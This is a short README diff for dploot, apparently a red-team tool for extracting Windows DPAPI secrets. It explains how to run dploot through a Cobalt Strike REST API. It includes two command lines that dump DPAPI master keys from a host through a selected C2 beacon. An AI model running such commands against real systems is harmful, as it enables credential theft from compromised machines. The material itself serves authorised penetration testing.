zblurx/dploot/README.md

 If you have a Cobalt Strike deployment with the [REST API](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_starting-rest-server.htm), you can execute dploot operations through it:

+By default, dploot will ask you to choose a beacon through a dropdown selection.
 You can also select a beacon by note:
 ```text
 $ dploot masterkeys --protocol cobaltstrike --rest-url https://127.0.0.1:50443 --cs-username admin --cs-password password --beacon-note "my-target"
 ```

 If multiple beacons match the note, then you will be asked to select one of them.
-Once a beacon is selected, dploot will give you the corresponding Beacon ID, that you will be able to use in dploot like so:
+Once a beacon is selected, dploot will give you the corresponding Beacon ID, that you will be able to use like so:
 ```text
 $ dploot masterkeys --protocol cobaltstrike --rest-url https://127.0.0.1:50443 --cs-username admin --cs-password password --beacon-id 1021841234
 ```